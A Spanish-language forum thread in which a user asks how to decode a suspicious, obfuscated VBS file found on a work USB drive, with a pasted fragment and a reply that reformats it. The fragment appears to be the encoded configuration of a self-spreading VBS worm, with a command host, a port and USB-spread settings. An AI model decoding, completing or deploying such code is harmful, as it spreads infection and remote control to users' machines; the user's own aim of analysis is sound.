Hola compañeros del foro, hoy vengo a molestarlos con una pregunta sobre algo que la verdad nunca se me cruzo aprender o leer al respecto. Les cuento, resulta que desde el trabajo alguien me trajo un pendrive para que copie unos documentos y los edite, pero al insertar el pendrive me encuentro con un archivo *.vbs que al abrirlo para editarlo (así podría ver el contenido) me encuentro con el contenido cifrado o fud (disculpen si no hacete en la descripción del texto pero no tengo conocimiento) por lo cual me llamo la atención de que puede ser un virus o un downloader. Ahora bien mi pregunta es como puedo por decirlo desencriptar el texto para poder hacerlo legible (por lo que llego a deducir tiene declarado algunas rutas, no se si de archivos o web), para asi poder aprender de como esta hecho o ver si se autocopia en la pc o no (porque vi declaraciones string que podria ser que genere algun nombre aleatorio).
aqui les dejo un fragmento del vbs.
d="NYXMUfSkzABuicqGmFxThlnrgeWosbHItJdRKEwVvpQLDjaCOyPZ"
g=""""
r="��kqxT = "&g&"nzcMqnx11.MMcx.cUT"&g&"�GqFT = 5181�zcxTNuuMzF = "&g&"%NGGMNTN%"&g&"�ucBfzuU = TFhU�ucBfquMUF = TFhU��Mzi xkUuuqYA �xUT xkUuuqYA = nxXFzGT.XFUNTUqYAUXT("&g&"nxXFzGT.xkUuu"&g&")�Mzi fzuUxgxTUiqYA�xUT fzuUxgxTUiqYA = XFUNTUqYAUX
coloco solo ese fragmento porque no se si puedo poner todo el codigo. :-\
HOLA!!!
Ese codigo genera lo siguiente:
d=
NYXMUfSkzABuicqGmFxThlnrgeWosbHItJdRKEwVvpQLDjaCOyPZ
g=
"
r=
kqxT = "nzcMqnx11.MMcx.cUT"
GqFT = 5181
zcxTNuuMzF = "%NGGMNTN%"
ucBfzuU = TFhU
ucBfquMUF = TFhU
Mzi xkUuuqYA
xUT xkUuuqYA = nxXFzGT.XFUNTUqYAUXT("nxXFzGT.xkUuu")
Mzi fzuUxgxTUiqYA
xUT fzuUxgxTUiqYA = XFUNTUqYAUX
GRACIAS POR LEER!!!